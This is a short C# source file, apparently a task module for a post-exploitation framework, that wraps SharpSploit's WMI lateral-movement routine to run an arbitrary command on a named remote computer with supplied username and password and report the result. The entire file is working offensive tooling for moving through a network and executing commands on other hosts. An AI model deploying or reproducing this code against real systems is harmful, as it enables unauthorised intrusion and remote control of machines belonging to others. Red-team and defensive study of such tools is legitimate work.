using System;

using SharpSploit.LateralMovement;

public static class Task
{
    public static string Execute(string ComputerName, string Command, string Username = "", string Password = "")
    {
        try
        {
            if (WMI.WMIExecute(ComputerName, Command, Username, Password))
            {
                return "WMI execution successful. Executed: \"" + Command + "\" on: " + ComputerName;
            }
            else
            {
                return "WMI execution failed.";
            }
        }
        catch (Exception e) { return e.GetType().FullName + ": " + e.Message + Environment.NewLine + e.StackTrace; }
    }
}